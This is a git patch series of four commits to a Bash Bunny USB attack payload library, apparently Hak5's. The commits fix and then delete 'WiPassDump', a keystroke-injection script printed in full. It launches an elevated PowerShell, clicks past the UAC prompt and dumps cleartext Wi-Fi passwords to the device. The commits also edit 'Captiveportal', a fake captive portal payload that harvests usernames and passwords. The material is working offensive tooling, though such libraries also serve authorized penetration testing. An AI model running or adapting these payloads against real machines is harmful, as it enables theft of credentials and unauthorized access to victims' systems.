From 50d8bc08269b39cf0fc72f67ef7b1411c2915210 Mon Sep 17 00:00:00 2001
From: JayDee Raymaker <jonerik84@gmail.com>
Date: Mon, 20 Mar 2017 20:51:10 +0100
Subject: [PATCH 1/4] Fixed UAC bypass

ALT o does nothing. Changed it to ALT y (means yes)
---
 payloads/library/WiPassDump/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt
index c141d9480..ea51416d5 100644
--- a/payloads/library/WiPassDump/payload.txt
+++ b/payloads/library/WiPassDump/payload.txt
@@ -33,7 +33,7 @@ Q ENTER
 
 # Bypass UAC
 Q DELAY 3000
-Q ALT o
+Q ALT y
 Q ENTER
 Q DELAY 500
 

From a18b22d95f571a23d6b14806e5df162ee9b297cf Mon Sep 17 00:00:00 2001
From: JayDee Raymaker <jonerik84@gmail.com>
Date: Tue, 21 Mar 2017 02:32:03 +0100
Subject: [PATCH 2/4] Commented out URL

The URL was a part of the script. Commented it out
---
 payloads/library/Captiveportal/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/Captiveportal/payload.txt b/payloads/library/Captiveportal/payload.txt
index c044eeace..c41834420 100644
--- a/payloads/library/Captiveportal/payload.txt
+++ b/payloads/library/Captiveportal/payload.txt
@@ -5,7 +5,7 @@
 # Version:       1.0
 
 # Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal
-https://forums.hak5.org/index.php?/topic/40237-install-tools/
+# https://forums.hak5.org/index.php?/topic/40237-install-tools/
 
 # Add or remove inputs here
 INPUTS=(username password)

From 15eba6736aabca5e495b36719a3282687677e9ae Mon Sep 17 00:00:00 2001
From: JayDee Raymaker <jonerik84@gmail.com>
Date: Tue, 21 Mar 2017 03:42:43 +0100
Subject: [PATCH 3/4] Fix from sebkinne

---
 payloads/library/Captiveportal/payload.txt | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

diff --git a/payloads/library/Captiveportal/payload.txt b/payloads/library/Captiveportal/payload.txt
index c41834420..13e8649e3 100644
--- a/payloads/library/Captiveportal/payload.txt
+++ b/payloads/library/Captiveportal/payload.txt
@@ -2,10 +2,7 @@
 #
 # Title:         Captiveportal
 # Author:        Sebkinne
-# Version:       1.0
-
-# Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal
-# https://forums.hak5.org/index.php?/topic/40237-install-tools/
+# Version:       1.1
 
 # Add or remove inputs here
 INPUTS=(username password)
@@ -18,6 +15,9 @@ ATTACKMODE RNDIS_ETHERNET
 #                  DO NOT EDIT BELOW THIS LINE                   #
 ##################################################################
 
+source bunny_helpers.sh
+WORKINGPATH="/root/udisk/payloads/$SWITCH_POSITION"
+
 # Sets up iptable forwarding and filters
 function setupNetworking() {
     echo 1 > /proc/sys/net/ipv4/ip_forward
@@ -30,8 +30,7 @@ function setupNetworking() {
 
 # Find payload directory and execute payload
 function startCaptiveportal() {
-#    cd $(dirname $(find /root/udisk/payloads/ -name portal.html))
-    cd /root/udisk/payloads/$SWITCH_POSITION
+    cd $WORKINGPATH
     chmod +x captiveportal
     ./captiveportal ${INPUTS[@]}
 }

From 0197135de5cd3122b75ada9509b36fec86f120f9 Mon Sep 17 00:00:00 2001
From: JayDee Raymaker <jonerik84@gmail.com>
Date: Fri, 26 May 2017 15:23:17 +0200
Subject: [PATCH 4/4] Delete payload.txt

---
 payloads/library/WiPassDump/payload.txt | 56 -------------------------
 1 file changed, 56 deletions(-)
 delete mode 100644 payloads/library/WiPassDump/payload.txt

diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt
deleted file mode 100644
index ea51416d5..000000000
--- a/payloads/library/WiPassDump/payload.txt
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/bin/bash
-#
-# Title:         WiPassDump
-# Author:        samdeg555
-# Version:       1.0
-# Target:        Windows
-# 
-# Runs powershell as Administrator
-# Bypasses UAC
-# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny
-#
-
-LED R 200
-
-# Create directory to dump infos
-mkdir -p /root/udisk/loot/WiPassDump
-
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
-
-# Set language accordingly
-Q SET_LANGUAGE ca
-
-ATTACKMODE HID STORAGE
-
-LED B 200
-
-# Launch powershell as admin
-Q GUI r
-Q DELAY 100
-Q STRING powershell Start-Process powershell -Verb runAs
-Q ENTER
-
-# Bypass UAC
-Q DELAY 3000
-Q ALT y
-Q ENTER
-Q DELAY 500
-
-# Start a.cmd
-Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/'
-Q STRING $SWITCH_POSITION
-Q STRING '/a.cmd'"'"')'
-Q ENTER
-
-# Wait for a.cmd to finish and exit
-
-LED R B 500
-
-Q DELAY 3000
-Q STRING exit
-Q ENTER
-
-sync
-
-LED G